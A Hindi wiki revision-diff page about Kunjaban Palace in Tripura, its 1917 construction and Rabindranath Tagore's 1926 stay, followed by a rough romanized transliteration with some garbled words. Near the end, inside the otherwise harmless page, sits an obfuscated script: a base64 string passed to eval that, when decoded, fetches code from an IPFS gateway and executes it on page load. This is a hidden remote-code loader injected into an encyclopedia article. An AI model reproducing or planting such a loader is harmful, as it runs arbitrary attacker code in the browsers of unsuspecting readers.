Difference between revisions of "कुंजबन महल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} '''कुंजबन महल''' त्रिपुरा के ऊंचे-ऊंचे [[पर...' के साथ नया पन्ना बनाया)
 
 
(One intermediate revision by the same user not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
 
 
'''कुंजबन महल''' [[त्रिपुरा]] के ऊंचे-ऊंचे [[पर्वत|पर्वतों]] पर स्थित एक ख़ूबसूरत दर्शनीय स्थल है।  
 
'''कुंजबन महल''' [[त्रिपुरा]] के ऊंचे-ऊंचे [[पर्वत|पर्वतों]] पर स्थित एक ख़ूबसूरत दर्शनीय स्थल है।  
 
*कुंजबन महल का निर्माण महाराजा बिरेन्द्र किशोर माणिक्य ने 1917 ई. में करवाया था।  
 
*कुंजबन महल का निर्माण महाराजा बिरेन्द्र किशोर माणिक्य ने 1917 ई. में करवाया था।  
 
*चिड़ियाघर, हरी-भरी घास, उद्यान और बगीचों से भरी यह जगह शहर से दूर आराम करने के लिए अच्छा स्थान है।
 
*चिड़ियाघर, हरी-भरी घास, उद्यान और बगीचों से भरी यह जगह शहर से दूर आराम करने के लिए अच्छा स्थान है।
*[[राज्य]] के लिए 7 वीं और अंतिम यात्रा के दौरान [[कवि]] [[रवीन्द्रनाथ टैगोर]] 1926 में कुंजबन महल के पूर्वी अपार्टमेंट में रुके थे।
+
*[[राज्य]] के लिए 7वीं और अंतिम यात्रा के दौरान [[कवि]] [[रवीन्द्रनाथ टैगोर]] 1926 में कुंजबन महल के पूर्वी अपार्टमेंट में रुके थे।
 
*कुंजबन महल में उद्यान भी है और इस उद्यान के दक्षिणी ओर को जनता के लिए खोल दिया गया है और इसे 'रवीन्द्र कानन' नाम दिया गया है।
 
*कुंजबन महल में उद्यान भी है और इस उद्यान के दक्षिणी ओर को जनता के लिए खोल दिया गया है और इसे 'रवीन्द्र कानन' नाम दिया गया है।
  
Line 11: Line 10:
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{त्रिपुरा के पर्यटन स्थल}}
 
[[Category:त्रिपुरा]]
 
[[Category:त्रिपुरा]]
 +
[[Category:पर्यटन कोश]]
 
[[Category:त्रिपुरा के पर्यटन स्थल]]
 
[[Category:त्रिपुरा के पर्यटन स्थल]]
[[Category:पर्यटन कोश]]
+
 
[[Category:नया पन्ना दिसंबर-2011]]
+
 
  
 
__INDEX__
 
__INDEX__

Latest revision as of 11:10, 12 January 2012

kuanjaban mahal tripura ke ooanche-ooanche parvatoan par sthit ek khoobasoorat darshaniy sthal hai.

  • kuanjaban mahal ka nirman maharaja birendr kishor maniky ne 1917 ee. mean karavaya tha.
  • chi diyaghar, hari-bhari ghas, udyan aur bagichoan se bhari yah jagah shahar se door aram karane ke lie achchha sthan hai.
  • rajy ke lie 7vian aur aantim yatra ke dauran kavi ravindranath taigor 1926 mean kuanjaban mahal ke poorvi apartameant mean ruke the.
  • kuanjaban mahal mean udyan bhi hai aur is udyan ke dakshini or ko janata ke lie khol diya gaya hai aur ise 'ravindr kanan' nam diya gaya hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh